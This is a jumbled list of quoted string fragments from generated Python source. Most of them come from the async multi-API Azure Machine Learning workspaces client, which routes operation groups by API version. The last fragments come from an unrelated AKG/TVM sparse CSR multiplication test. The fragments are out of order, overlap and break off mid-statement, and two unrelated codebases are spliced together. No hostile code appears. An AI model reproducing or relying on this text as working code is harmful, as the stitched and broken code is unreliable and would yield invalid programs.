'2022-02-01-preview': from ..v2022_02_01_preview import models return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version))", "..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations", "1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client,", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>`", "2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version", "== 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {}", "api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version", "'2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations", "ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance", "import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as", "does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` *", "self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version", "* 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01':", "import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on", "depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01:", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: *", "does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else:", "models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version =", "'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0',", "{} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "== '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise", "the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version", "version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version =", "{} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "= None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type:", "= self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else:", "'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version))", "else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client,", "self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise", "from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {} does not", "from ..v2022_05_01 import models return models raise ValueError(\"API version {} is not available\".format(api_version))", "API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version", "== '2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "'2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "\"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as", "API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0':", "{} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>`", "def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version", "version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview:", "group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif", "2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01':", "2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01':", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to", "on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>`", "group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on", "..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", ") @classmethod def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items()", "= AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif", "self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts')", "* 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior", "VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass", "version. The api-version parameter sets the default API version if the operation group", "* 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources')", "to a particular api-version and/or profile. The profile sets a mapping between an", "depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if", "\"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations')", "else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client,", "from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>`", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version ==", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version))", "'2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: *", "version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if", "..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have", "{} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance", "does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status')", "from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if", "= ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint':", "if the operation group is not described in the profile. :param credential: Credential", "BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: *", "* 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version ==", "\"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from", "def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version", "not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self):", "does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} does", "# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. #", "1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0':" ]
[ "compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform", "output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape,", "def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim", "len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the", "ib.for_range(0, end - start, name='j') as j: pos = start + j with", "start, name='j') as j: pos = start + j with ib.if_scope(pos < end):", "(1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx,", "print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source", "as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with", "scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2),", "print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx,", "num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i +", "{}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source =", "output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype,", "target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if", "\"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name !=", "with ib.for_range(0, end - start, name='j') as j: pos = start + j", "not res: mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error", "!= \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]:", "== len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and", "akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def", "target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data,", "need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const(", "pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val *", "1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand =", "ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense", "(dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res =", "format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def", "= get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim =", "ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as j: pos", "+ sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx],", "j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos)", "lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1,", "dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1,", "= expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape,", "expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] //", "gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as", "pos = start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos)", "rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if", "tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling", "ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos,", "kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype)", "with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope():", "ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start,", "dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\"))", "same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape)", "sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and", "< broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0,", "test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"}", "len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim =", "op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output", "and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] <", "end - start, name='j') as j: pos = start + j with ib.if_scope(pos", "val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val", "broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows,", "attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs =", "tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils", "output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx,", "with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope():", "\"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype,", "2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and", "2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype ==", "= to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name,", "< len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim", "pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name", "i + 1) with ib.for_range(0, end - start, name='j') as j: pos =", "shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <=", "sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight", "get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) 